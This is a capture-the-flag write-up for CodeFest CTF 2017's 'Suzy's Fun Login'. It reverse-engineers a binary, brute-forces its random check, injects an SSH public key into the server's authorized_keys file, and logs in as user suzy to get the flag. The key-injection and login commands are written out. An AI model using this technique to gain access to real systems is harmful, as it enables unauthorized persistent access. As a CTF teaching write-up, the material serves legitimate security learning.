CodeFest CTF 2017 - Suzy's Fun Login Writeup

by andreafioraldi
September 23, 2017

Connecting to the remote service we can see that the response is random:

Screenshot showing random server response

Whats? It’s time to open Ida. In the main function we can see a lot of rubbish, so we locate the interesting function using the Xref of the string Do you want to play? (Y/N?): .

This is the decompiled function:

Screenshot of decompiled function checking for sub_40877C() function

We can see that the program behaviour is conditionated by the procedure sub_40877C, that supposedly has a side effect on the variable v7.

Analyze them.

Screenshot of sub_40877C() function writing random numbers to array

Ok, it’s simple, it writes three random numbers in range(0, 3) in the array passed as argument.

Returning to the previous function we see that this three numbers mus be, in order, 0 1 2.

We can brute force it.

Screenshot showing brute forcing random numbers to be 012

Now it’s time to know the content of dest variable, the name of the file in which the program will write our bet.

Viewing the global variable src it is an array of three pointer to the strings /home/suzy, .ssh, authorized_keys.

Screenshot showing src array containing filename components

Ok, now we have all info to solve the challenge.

~/.ssh/authorized_keys is the file in which a server store all authorized public ssh keys, so we must pass an ssh public key as input.

With ssh-keygen -t rsa -b 1024 we generate our key (1024 because fgets read at most 398 bytes).

Now copy the content of the public key (it is like ssh-rsa AAAA...otherbase64chars... yourusername@localhost.localdomain) and try to insert it until you get the response You won the lottery, but were you smart enough to make the right bets?.

Congratulations, you have inserted the key on the server.

Now type in the terminal ssh -i private_key_file suzy@13.126.83.119 (suzy is the remote user that we found hardcoded in the binary).

You are logged in, navigate the filesystem and get your flag.

-> flag{wowyouknowyourexecutables}